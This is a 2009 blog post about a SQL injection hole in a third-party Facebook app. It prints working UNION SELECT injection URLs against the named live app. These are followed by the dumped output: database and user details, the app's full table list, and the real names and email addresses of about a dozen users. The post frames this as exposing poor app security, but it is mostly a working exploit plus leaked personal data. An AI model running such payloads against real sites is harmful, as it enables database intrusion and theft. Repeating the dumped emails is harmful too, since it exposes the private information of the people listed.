2009
11.18

Facebook sql vulnerability

Category: Security / Tag:  / Add Comment

Facebook architecture allows 3rd parties to install bunch of applications that will let you play, make some quiz and other. Basically the will suck your profile informations and parse the result in facebook pages.

The major problem is that Facebook doesn’t control the apps and some code are really bad. Here is an exemple of sql injection allowing to dump all info from a database: email, login, password and more.http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+AND+1=2+UNION+SELECT+1,group_concat%28column_nam e%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+in formation_schema.columns+where+table_name=0x41646d 696e5f55736572-

http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+AND+1=2+UNION+SELECT+1,0x70617373776F7264,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+Admin_User–

Invalid challenge id=’-1 AND 1=2 UNION SELECT 1,0x70617373776F7264,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17 from Admin_User–‘, please try again

http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+AND+1=2+UNION+SELECT+1,group_concat%28name,0x3a, email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+User

  • Database : adminclt_testsite
  • Database User : adminclt_13@209.68.2.10
  • MySQL Version : 5.0.67-log
roberts:roberts.davel@gmail.com,
Jason Silverstein:jason.silverstein@gmail.com,
Red Web:redonweb@hotmail.com,
Andrew Dunn:andrewmdunn@gmail.com,:,
Steve Gunn:sgunn@charlotteobserver.com,
Matt Kirk:mkirk@charlotte.com,:,:,:,:,
Amy Gahran:amy@gahran.com,
Ellyn Angelotti:eangelotti@poynter.org,
Seamus Condron:seamus.condron@gmail.com,:,
Sara Gregory:sara.e.gregory@gmail.com,
Lisa Schnellinger:lschnellinger@gmail.com,
Justin Ruckman:justin@cltblog.com,:,:,:,:,:,:,
Andrew Dunn:andrew.dunn@unc.edu,
1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions

1 comment so far

Add Your Comment
  1.   How Facebook Apps Can Compromise Your Privacy, & How to Fix (Maybe) — contentious.com said: 2009.11.19 01:49

    […] I’m not 100% certain that Facebook was inappropriately sharing my content via its API. Deepquest posted some technical background on this issue. I’m not a programmer, and I understand only a little bit about SQL. But he […]

Your Comment

You must be logged in to post a comment.